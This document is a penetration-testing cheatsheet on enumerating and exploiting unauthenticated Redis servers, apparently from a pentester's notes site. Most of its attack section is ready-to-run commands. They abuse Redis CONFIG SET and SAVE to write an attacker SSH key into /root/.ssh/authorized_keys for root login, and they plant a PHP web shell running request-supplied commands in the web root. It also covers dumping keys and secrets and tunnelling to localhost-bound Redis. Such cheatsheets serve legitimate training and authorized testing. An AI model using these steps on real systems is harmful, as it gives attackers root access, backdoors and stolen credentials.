Skip to content

Redis Enum & Exp

This cheatsheet focuses on Redis (Remote Dictionary Server). It is an in-memory key-value store frequently left unauthenticated on internal networks, providing direct pathways to sensitive data exposure or Remote Code Execution (RCE).

Reconnaissance

Redis typically runs on port 6379. The initial goal is to identify the service and check if it allows anonymous access.

extract version info and check for unauthenticated access 

nmap -p 6379 --script redis-info 10.10.10.10

connect directly to the Redis instance 

redis-cli -h 10.10.10.10
connect with a password (if authentication is enforced)

redis-cli -h 10.10.10.10 -a "password"

Enumeration

Once connected to the Redis prompt (10.10.10.10:6379>), gather system configuration details and dump stored keys to find credentials or application secrets.

Efficiency

The INFO command is your best starting point. It dumps the OS version, Redis version, and the absolute paths to configuration files, which is critical for planning file-write exploits.

# Display server information and statistics
10.10.10.10:6379> INFO

# List all keys in the current database
10.10.10.10:6379> KEYS *

# Read the plaintext contents of a specific key
10.10.10.10:6379> GET <key_name>

# View all active configuration parameters
10.10.10.10:6379> CONFIG GET *

Rabbit Hole

Redis supports multiple logical databases (indexed by numbers, usually 0-15). If KEYS * returns nothing, you might just be in an empty database. Switch databases using the SELECT <index> command (e.g., SELECT 1) before searching for keys again.

Exploitation

If the Redis instance runs with high privileges (e.g., root or www-data), you can leverage its native database save mechanism to write arbitrary files to the target file system.

# 1. Generate an SSH keypair locally and pad it with newlines
ssh-keygen -t rsa -f mykey
(echo -e "\n\n"; cat mykey.pub; echo -e "\n\n") > foo.txt


# 2. Push the padded public key into a temporary Redis key
cat foo.txt | redis-cli -h 10.10.10.10 -x set crackit

# 3. Connect to Redis and configure the save path to the root SSH directory
redis-cli -h 10.10.10.10
10.10.10.10:6379> CONFIG SET dir /root/.ssh/
10.10.10.10:6379> CONFIG SET dbfilename "authorized_keys"
10.10.10.10:6379> SAVE

# 4. SSH directly into the box
ssh -i mykey root@10.10.10.10

# Write a PHP webshell directly into the web root 
redis-cli -h 10.10.10.10 
10.10.10.10:6379> CONFIG SET dir /var/www/html/ 
10.10.10.10:6379> CONFIG SET dbfilename shell.php 
10.10.10.10:6379> SET payload "<?php system($_GET['cmd']); ?>" 
10.10.10.10:6379> SAVE `

Privilege Escalation

While Redis itself is usually the mechanism for privilege escalation (via the root SSH key trick), you may encounter hardened, authenticated Redis instances. If you compromise a low-privileged shell on the host, always check local configuration files for plaintext Redis passwords.

Important

In secure environments, the Redis service is bound strictly to 127.0.0.1 (localhost), making it inaccessible from the outside. If you get a foothold on the machine, you can interact with it locally or use an SSH tunnel (ssh -L 6379:127.0.0.1:6379 user@10.10.10.10) to exploit it from your attacking machine.

Post-Mortem & Methodology Notes

  • Default Lack of Auth: Historically, Redis did not require authentication by default. Always attempt to connect without passing credentials first.
  • Padding is Mandatory: When writing SSH keys via Redis, the database dump includes extra binary data. If you don't pad your public key with newlines (\n\n), the authorized_keys parser on the target will fail to read it cleanly.
  • Path Enumeration: The web shell exploitation method relies entirely on knowing the exact absolute path to the web root. Use the INFO command or prior HTTP enumeration to identify non-standard paths before attempting the write.